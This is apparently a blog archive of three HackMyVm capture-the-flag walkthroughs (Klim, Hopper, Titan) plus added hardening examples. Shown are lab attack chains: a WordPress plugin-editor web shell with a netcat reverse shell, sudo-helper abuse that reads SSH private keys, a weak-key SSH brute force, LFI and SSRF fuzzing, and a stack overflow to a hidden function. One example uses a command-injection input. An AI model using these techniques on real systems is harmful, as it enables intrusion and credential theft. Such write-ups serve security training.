Monthly archive: August 2021

HackMyVm Klim Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Klim

Scan ports.

```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100
Host is up (0.0024s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
|   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
|_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Ubuntu Default Page: It works Annex02!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Scan port 80; WordPress is found.

```bash
/index.html (Status: 200) [Size: 11331]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
```

Use wpscan against /wordpress, but nothing useful turns up. Manually check /wp-content/uploads and find an image.

```bash
~ wget http://192.168.56.100/wordpress/wp-content/uploads/2021/07/image.jpg
```
Use stegseek to recover the passphrase and extract the hidden file, dump.
```bash
~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt
StegSeek version 0.5
Progress: 10.94% (15259007 bytes)

[i] --> Found passphrase: "ichliebedich"
[i] Original filename: "dump"
[i] Extracting to "image.jpg.out"
~ mv image.jpg.out dump
```
Login credentials are found in dump.
```bash
~ cat dump|grep pwd
log=klim&pwd=ss7WhrrnnHOZC%239bQn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.26%2Fwordpress%2Fwp-admin%2F&testcookie=1
~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"
ss7WhrrnnHOZC#9bQn
```
Log in to WordPress. In the Plugin Editor, modify one PHP file and add your PHP shell code to its source.

Then get a reverse shell.
```bash
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:57032.
Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
 04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Check sudo -l as www-data.
```bash
www-data@klim:/home/klim$ sudo -l
sudo -l
Matching Defaults entries for www-data on klim:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on klim:
    (klim) NOPASSWD: /home/klim/tool
```
Decompile tool and read the source. It builds the string "cat " followed by argv[1] and passes it to system().
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rbx
  size_t v4; // rax
  char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
  char *dest; // [rsp+20h] [rbp-20h]
  size_t size; // [rsp+28h] [rbp-18h]

  strcpy(s, "cat ");
  v3 = strlen(s);
  size = v3 + strlen(argv[1]) + 1;
  dest = (char *)malloc(size);
  strncpy(dest, s, size);
  v4 = strlen(s);
  strncat(dest, argv[1], size - v4);
  system(dest);
  return 0;
}
```
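As an added example (not code from the walkthrough or from the Klim binary), the following shows why handing a concatenated string to system() is the dangerous part of tool, and what the same feature looks like with no shell in the path. The directory and file names are constructed for the demo; run_safe also confines the path to one directory, which is the check a sudo-exposed helper like this should have had.

```python
"""Added example (not from the walkthrough): the risk in tool's
system("cat " + argv[1]) pattern, next to a hardened equivalent.

system() hands the assembled string to /bin/sh, so whatever is in argv[1] is
parsed by the shell rather than treated as a file name. The safe variant passes
the path as a single argv element (no shell) and confines it to one directory.
All file names and directories below are constructed for this demo.
"""
import os
import shlex
import subprocess
import tempfile


def build_cat_command(user_path):
    """Plain concatenation, mirroring what the decompiled tool does."""
    return "cat " + user_path


def build_cat_command_quoted(user_path):
    """Minimal fix if a shell string really is required: quote the argument."""
    return "cat " + shlex.quote(user_path)


def run_unsafe(user_path):
    """Equivalent of system(): the string goes through /bin/sh -c."""
    proc = subprocess.run(build_cat_command(user_path), shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def run_safe(user_path, allowed_dir):
    """Hardened variant: no shell, one argv element, path confined to allowed_dir."""
    root = os.path.realpath(allowed_dir)
    target = os.path.realpath(os.path.join(root, user_path))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"{user_path!r} escapes {allowed_dir!r}")
    proc = subprocess.run(["cat", target], capture_output=True, text=True)
    return proc.stdout


def demo():
    """Run both variants on a constructed file and on an argument carrying a ';'."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "notes.txt"), "w") as f:
            f.write("hello\n")
        tricky = "notes.txt; echo INJECTED"        # constructed argument
        results = {
            "safe_normal": run_safe("notes.txt", d),
            # the shell sees the ';' and runs a second command
            "unsafe_tricky": run_unsafe(os.path.join(d, tricky)),
            # no shell: the whole string is one (nonexistent) file name
            "safe_tricky": run_safe(tricky, d),
        }
        try:
            run_safe("../../../etc/hostname", d)
            results["safe_traversal"] = "allowed"
        except PermissionError:
            results["safe_traversal"] = "blocked"
        return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The sudo rule makes tool run as klim, so the shell parse of argv[1] is the whole problem; exec-style argument passing removes it, and the directory confinement limits what even a correct cat may read.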
Get the SSH key of user klim.

```bash
www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
sudo -u klim ./tool .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA0IBOKXuvWzdN/rTJXWZ7b1FadoLr5jQZ+LkaEJDWaUnYFlCpNd4e
...
jwq/pz/4h+tzLkK+HocyYZFSZ+3Q3Rv4CK7HeWC80rfLNsc3ZktG755/WQLlXCSJ50sUmp
Fp3Lkp1BGomrgELk4qqf3aF291nYcnSZVu0AfvlRWHHa52o23nuhu/rdcTQX5Lh4kWhWyz
49he3VMR4O2JnBj2dwAAAAlrbGltQGtsaW0=
-----END OPENSSH PRIVATE KEY-----
www-data@klim:/home/klim$
```

Log in via SSH as klim.

```bash
~ ssh klim@192.168.56.100 -i id_rsa
Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 25 12:19:50 2021 from 192.168.0.28
/usr/bin/xauth:  file /home/klim/.Xauthority does not exist
klim@klim:~$ id
uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

id_rsa.pub is found in /opt. Following the author's hint, look for an OpenSSL exploit.

```bash
~ searchsploit openssl ...
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
...
```

Follow the steps in the PoC.

```bash
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar -jxvf 5622.tar.bz2
python 5720.py rsa/2048 192.168.56.100 root 22
Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec

Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005 192.168.56.100

Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec
```

Get a root login.

```bash
~ ssh root@192.168.56.100 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
...
root@klim:~# id;hostname
uid=0(root) gid=0(root) groupes=0(root)
klim
```

HackMyVm Hopper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hopper

Scan ports.

```bash
~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
Nmap scan report for bogon (192.168.56.100)
Host is up (0.00079s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
|   256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
|_  256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Enumerate port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.z[500/1872]
403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 80]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/advanced-search (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]
```

Check /advanced-search: enter anything and click "Submit", and notice that the URL becomes http://192.168.56.100/advanced-search/path.php?path=xxx. Fuzz for LFI.

```bash
~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000005:   200        227 L    1115 W     7224 Ch     "/etc/apache2/apache2.conf"
000000001:   200        27 L     39 W       1439 Ch     "/etc/passwd"
000000018:   200        12 L     88 W       664 Ch      "/etc/fstab"
...
000000188:   200        0 L      1 W        32064 Ch    "/var/log/faillog"
000000224:   200        1 L      4 W        1151 Ch     "/var/run/utmp"
000000220:   200        34 L     237 W      164321 Ch   "/var/log/wtmp"
000000199:   200        0 L      1 W        292584 Ch   "/var/log/lastlog"
```
Get usernames from passwd.

```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash
```

Write a Python script that enumerates local ports through the same parameter.

```python
#!/usr/bin/python3
import requests

# Each request makes path.php fetch a loopback URL; an empty body means the
# connection was refused, a non-empty body means something answered.
for port in range(1, 65536):
    res = requests.get(
        f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}',
        timeout=5,
    )
    if len(res.text) == 0:
        continue
    print(f'port {port} is open.')
```

Port 2222 is open.

```bash
~ python3 enum.py
port 22 is open.
port 80 is open.
port 2222 is open.
```

Check port 2222.

```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'
<!DOCTYPE html>
<html>
<body>

<h1>[+] WARNING</h1>

<p> - Private corporative web server</p>

<p> - If you are non organization personal, leave immediately</p>

</body>
</html>
```
Fuzz directories on port 2222.

```bash
~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222' -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard --exclude-length 181

/backup (Status: 200) [Size: 1751]
...
```
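The path.php parameter above reaches both local files (file://) and the loopback service on 2222 (http://127.0.0.1:2222). As an added example, not code from the walkthrough or from the Hopper application, the following check is what a fetch parameter like this should do before any request is made; ALLOWED_HOSTS is a constructed allow-list.

```python
"""Added example (not from the walkthrough): an allow-list check for a
fetch-style parameter such as path.php?path=...

Only http/https is accepted, IP literals in loopback/private/link-local
space are refused, and the host must then be on an explicit allow-list, so
names like 'localhost' or unusual IP spellings that ipaddress does not parse
fall through to the allow-list and are refused as well.
ALLOWED_HOSTS is a constructed value for this example.
"""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"docs.example.com", "cdn.example.com"}   # constructed allow-list


def is_internal_ip(host):
    """True if host is an IP literal in loopback/private/link-local/reserved space."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False          # not an IP literal; the allow-list decides
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_unspecified)


def check_fetch_target(url):
    """Return (allowed, reason) for a user-supplied fetch URL."""
    try:
        parts = urlsplit(url)
        host = parts.hostname      # lower-cased; IPv6 brackets stripped
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "missing host"
    if is_internal_ip(host):
        return False, f"internal address {host}"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allow-list"
    return True, "ok"


SAMPLES = [                                  # constructed inputs
    "file:///etc/passwd",
    "http://127.0.0.1:2222",
    "http://[::1]:2222/",
    "http://10.8.0.2/backup",
    "http://localhost/",
    "http://other.example/",
    "https://docs.example.com/page",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(f"{u:35} -> {check_fetch_target(u)}")
```

Two limits to keep in mind: a hostname on the allow-list still resolves at request time, so the resolved address should be checked as well to cover DNS rebinding, and if the fetcher follows redirects the redirected URL must go through the same check.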


Get an id_rsa key from /backup. chmod 600 it and brute-force the key's passphrase.

```bash
~ /usr/share/john/ssh2john.py id_rsa  > hash.txt
~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
...
barcelona        (id_rsa)
```
Log in via SSH as user edward.

```bash
~ ssh edward@192.168.56.100 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth:  file /home/edward/.Xauthority does not exist
edward@hopper:~$ id
uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```
Upload a PHP reverse shell and get a shell as www-data.

```bash
~ curl http://192.168.56.100/r.php
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:35698.
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
 07:07:50 up  1:41,  0 users,  load average: 0.01, 0.02, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Check sudo -l.

```bash
www-data@hopper:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on hopper:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on hopper:
    (henry) NOPASSWD: /usr/bin/watch
```


Set the TERM environment variable, then escalate to user henry through watch.

```bash
www-data@hopper:/$ export TERM=xterm-256color
export TERM=xterm-256color
www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
$ id
id
uid=1001(henry) gid=1001(henry) groups=1001(henry)
```
Upload id_rsa.pub to /home/henry/.ssh/, rename it to authorized_keys, and log in via SSH as user henry.
```bash
~ ssh henry@192.168.56.100
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth:  file /home/henry/.Xauthority does not exist
henry@hopper:~$ id
uid=1001(henry) gid=1001(henry) grupos=1001(henry)
```
Check sudo -l.
```bash
henry@hopper:~$ sudo -l
Matching Defaults entries for henry on hopper:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on hopper:
    (root) NOPASSWD: /usr/bin/ascii-xfr
```
Use ascii-xfr to create an authorized_keys file for root.
```bash
henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys
ASCII download of "/root/.ssh/authorized_keys"

0.6 Kbytes transferred at 565 CPS... Done.
```
Log in as root.

```bash
~ ssh root@192.168.56.100
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth:  file /root/.Xauthority does not exist
root@hopper:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
hopper
```

HackMyVm Titan Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Titan

Scan ports first.

```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for chronos.local (192.168.56.100)
Host is up (0.00098s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 37:fa:d2:9f:20:25:cf:c5:96:7a:dc:f3:ff:2c:7a:22 (RSA)
|   256 11:ad:fa:95:71:c5:f9:d4:97:da:42:03:2b:0f:55:bb (ECDSA)
|_  256 fa:fb:04:13:93:90:a5:01:53:ba:6c:e9:bf:dc:bf:7e (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Scan port 80; /robots.txt is found, and it lists athena.txt. Download it.

```bash
~ curl http://192.168.56.100/robots.txt
/athena.txt

~ wget http://192.168.56.100/athena.txt
```

Open athena.txt in vim; it contains odd runs of spaces and tabs.

[image: image-20210829143154657.png]

Googling "space tab steg" shows this is whitespace steganography, which stegsnow can decode. Decoding gives the username and password of prometheus.

```bash
~ sudo apt install stegsnow
stegsnow is already the newest version (20130616-6).
~ stegsnow -C athena.txt
prometheus/iloveallhumans
```

Log in via SSH as prometheus; there is a file named sacrifice in the home folder.

```bash
prometheus@titan:~$ ls -la
total 52
drwxr-xr-x 2 prometheus prometheus  4096 Aug 18 06:03 .
drwxr-xr-x 5 root       root        4096 Aug  9 14:23 ..
-rw------- 1 prometheus prometheus  2718 Aug 18 05:01 .bash_history
-rw-r--r-- 1 prometheus prometheus   220 Aug  9 14:23 .bash_logout
-rw-r--r-- 1 prometheus prometheus  3526 Aug  9 14:23 .bashrc
-rw-r--r-- 1 prometheus prometheus   807 Aug  9 14:23 .profile
-rwsr-sr-x 1 root       prometheus 16896 Aug  9 14:29 sacrifice
-rw------- 1 prometheus prometheus   102 Aug 18 05:51 .Xauthority
```

Disassembling sacrifice shows that entering "beef" escalates to the user with uid 1000 (0x03E8).

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s1[72]; // [rsp+10h] [rbp-50h] BYREF
  int v6; // [rsp+5Ch] [rbp-4h]

  v6 = 1000;
  printf("What is your offer to the gods?");
  gets(s1);
  if ( strcmp(s1, "beef") )
  {
    printf("Thanks, mortal.");
  }
  else
  {
    setuid(0x3E8u);
    setgid(0x3E8u);
    printf("Take this gift.");
    system("/bin/bash");
  }
  return 0;
}
```

Now we can escalate to user zeus.

```bash
prometheus@titan:~$ ./sacrifice
What is your offer to the gods?beef
zeus@titan:~$ id
uid=1000(zeus) gid=1001(prometheus) groups=1001(prometheus)
```

Check sudo -l.

```bash
zeus@titan:~$ sudo -l
Matching Defaults entries for zeus on titan:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on titan:
    (hesiod) NOPASSWD: /usr/bin/ptx
```

Check the help of ptx; it can be used to read /home/hesiod/.ssh/id_rsa.

```bash
zeus@titan:/home/zeus$ sudo -u hesiod ptx /home/hesiod/.ssh/id_rsa -A -G
.xx "PRIVATE/" "" "-----BEGIN OPENSSH" "" "/home/hesiod/.ssh/id_rsa:1"
.xx "PRIVATE/" "" "-----END OPENSSH" "" "/home/hesiod/.ssh/id_rsa:27"
.xx "" "" "/JT+LbNag1ZqqNu02YET846I1xppdx/gYK5/hW19Shrw0F+V+G2U0AaVxfgFb+B2Sz+QER" "" "/home/hesiod/.ssh/id_rsa:16"
...
.xx "" "" "xUBZ868cu5Flrby84V8UpiXE+tPyq5bZUw24nlJTURFzqy0LkAcAtKQVihXaaoAlOJvz7z" "" "/home/hesiod/.ssh/id_rsa:22"
.xx "" "" "xqQSsiROLKN/zVEXAAAADGhlc2lvZEB0aXRhbgECAwQFBg==" "" "/home/hesiod/.ssh/id_rsa:26"
```


Paste the lines in order into a new key file, chmod 600, and log in as hesiod with the private key.

```bash
~ ssh hesiod@192.168.56.100 -i id_rsa
...
Last login: Wed Aug 18 05:51:27 2021 from 192.168.56.150
hesiod@titan:~$ id
uid=1002(hesiod) gid=1002(hesiod) groups=1002(hesiod)
hesiod@titan:~$
```
In /home/hesiod there is a file named fire. It is writable.
```bash
hesiod@titan:~$ ls -la
total 56
drwxr-xr-x 4 hesiod hesiod  4096 Aug 18 02:11 .
drwxr-xr-x 5 root   root    4096 Aug  9 14:23 ..
-rw------- 1 hesiod hesiod  1265 Aug 18 01:51 .bash_history
-rw-r--r-- 1 hesiod hesiod   220 Aug  9 14:23 .bash_logout
-rw-r--r-- 1 hesiod hesiod  3526 Aug  9 14:23 .bashrc
-rwxr-x--- 1 hesiod hesiod 16608 Aug  9 14:27 fire
drwxr-xr-x 3 hesiod hesiod  4096 Aug  9 14:25 .local
-rw-r--r-- 1 hesiod hesiod   807 Aug  9 14:23 .profile
drwx------ 2 hesiod hesiod  4096 Aug  9 14:31 .ssh
-rw------- 1 hesiod hesiod   102 Aug 18 02:11 .Xauthority
```
Now comes the key point for root.

Go back to sacrifice in the disassembler; scrolling up a little reveals a hidden function named "thief".
```asm
.text:0000000000001185                 public thief
.text:0000000000001185 thief           proc near
.text:0000000000001185 ; __unwind {
.text:0000000000001185                 push    rbp
.text:0000000000001186                 mov     rbp, rsp
.text:0000000000001189                 mov     edi, 0          ; uid
.text:000000000000118E                 call    _setuid
.text:0000000000001193                 mov     edi, 0          ; gid
.text:0000000000001198                 call    _setgid
.text:000000000000119D                 lea     rdi, command    ; "/home/hesiod/fire"
.text:00000000000011A4                 call    _system
.text:00000000000011A9                 nop
.text:00000000000011AA                 pop     rbp
.text:00000000000011AB                 retn
.text:00000000000011AB ; } // starts at 1185
.text:00000000000011AB thief           endp
.text:00000000000011AB
.text:00000000000011AC
.text:00000000000011AC ; =============== S U B R O U T I N E =======================================
.text:00000000000011AC
.text:00000000000011AC ; Attributes: bp-based frame
.text:00000000000011AC
.text:00000000000011AC ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:00000000000011AC                 public main
.text:00000000000011AC main            proc near               ; DATA XREF: _start+1D↑o
.text:00000000000011AC
.text:00000000000011AC var_60          = qword ptr -60h
.text:00000000000011AC var_54          = dword ptr -54h
.text:00000000000011AC s1              = byte ptr -50h
.text:00000000000011AC var_8           = dword ptr -8
.text:00000000000011AC var_4           = dword ptr -4
.text:00000000000011AC
.text:00000000000011AC ; __unwind {
.text:00000000000011AC                 push    rbp
.text:00000000000011AD                 mov     rbp, rsp
.text:00000000000011B0                 sub     rsp, 60h
.text:00000000000011B4                 mov     [rbp+var_54], edi
.text:00000000000011B7                 mov     [rbp+var_60], rsi
```
Reading the disassembly gives the final method:

Overflow sacrifice so that it returns into the hidden function "thief"; "thief" then runs /home/hesiod/fire, so writing shell code into fire gives root.

To pwn sacrifice, the first step is to calculate the offset of the overflow point. Download sacrifice to the local machine and load it in gdb-peda.

Create pattern string with length 200.

```bash
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
```

Enter r to run the program; when it asks for input, paste the pattern string above.

```bash
gdb-peda$ r
Starting program: /home/kali/Documents/titan/sacrifice
What is your offer to the gods?AAA%AAsA...
```

The program gets a segmentation fault because the return address is invalid.

```bash
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
...
RSP: 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
RIP: 0x55555555524a (<main+158>:        ret)
...
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x55555555523f <main+147>:   call   0x555555555040 <printf@plt>
   0x555555555244 <main+152>:   mov    eax,0x0
   0x555555555249 <main+157>:   leave
=> 0x55555555524a <main+158>:   ret
   0x55555555524b:      nop    DWORD PTR [rax+rax*1+0x0]
   0x555555555250 <__libc_csu_init>:    push   r15
   0x555555555252 <__libc_csu_init+2>:  mov    r15,rdx
   0x555555555255 <__libc_csu_init+5>:  push   r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0x7fffffffe4f0 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
...
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000055555555524a in main ()
```

Use "pattern search" to find that the offset for [RSP] is 88. [RSP] points to the original return address, which is what we want to overwrite with our own return address.

```bash
gdb-peda$ pattern search
Registers contain pattern buffer:
RBP+0 found at offset: 80
Registers point to pattern buffer:
[RSP] --> offset 88 - size ~112
[R8] --> offset 0 - size ~212
...
```

The method is to fill 87 characters, followed by the address of the hidden function "thief", 0x555555555185 (it may differ on your machine).

```bash
gdb-peda$ disassemble 0x555555555185
Dump of assembler code for function thief:
0x0000555555555185 <+0>: push rbp
0x0000555555555186 <+1>: mov rbp,rsp
0x0000555555555189 <+4>: mov edi,0x0
0x000055555555518e <+9>: call 0x555555555080 <setuid@plt>
0x0000555555555193 <+14>: mov edi,0x0
0x0000555555555198 <+19>: call 0x555555555070 <setgid@plt>
0x000055555555519d <+24>: lea rdi,[rip+0xe64] # 0x555555556008
0x00005555555551a4 <+31>: call 0x555555555030 <system@plt>
0x00005555555551a9 <+36>: nop
0x00005555555551aa <+37>: pop rbp
0x00005555555551ab <+38>: ret
End of assembler dump.
```


Because an Intel machine is little-endian, the 64-bit address 0x555555555185 is written as "\x85\x51\x55\x55\x55\x55\x00\x00" in Python string format.
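The two numbers this section rests on can be checked without a debugger. The block below is an added example, not part of the walkthrough: it reproduces what gdb-peda's pattern search does on the pattern and the [RSP] contents quoted above, derives the same 88 from the frame layout in the disassembly (s1 = byte ptr -50h, plus the 8-byte saved rbp), and packs the thief address little-endian. The function names are this example's own. One caveat worth knowing: print() encodes a str as UTF-8, so "\x85" leaves Python as two bytes (0xC2 0x85); with 87 filler characters the stray 0xC2 becomes the 88th byte and the eight bytes after it land exactly on the saved return address, which is why 87 lines up with the 88 that pattern search reports.

```python
"""Added example (not from the walkthrough): re-deriving the Titan numbers.

PEDA_PATTERN and AT_RSP are copied from the gdb-peda output quoted above;
the function names are this example's own.
"""
import struct

# 'pattern create 200' output from the walkthrough
PEDA_PATTERN = "AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"

# What gdb-peda showed at [RSP] when the program crashed
AT_RSP = "AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"


def offset_from_pattern(pattern, at_rsp, width=8):
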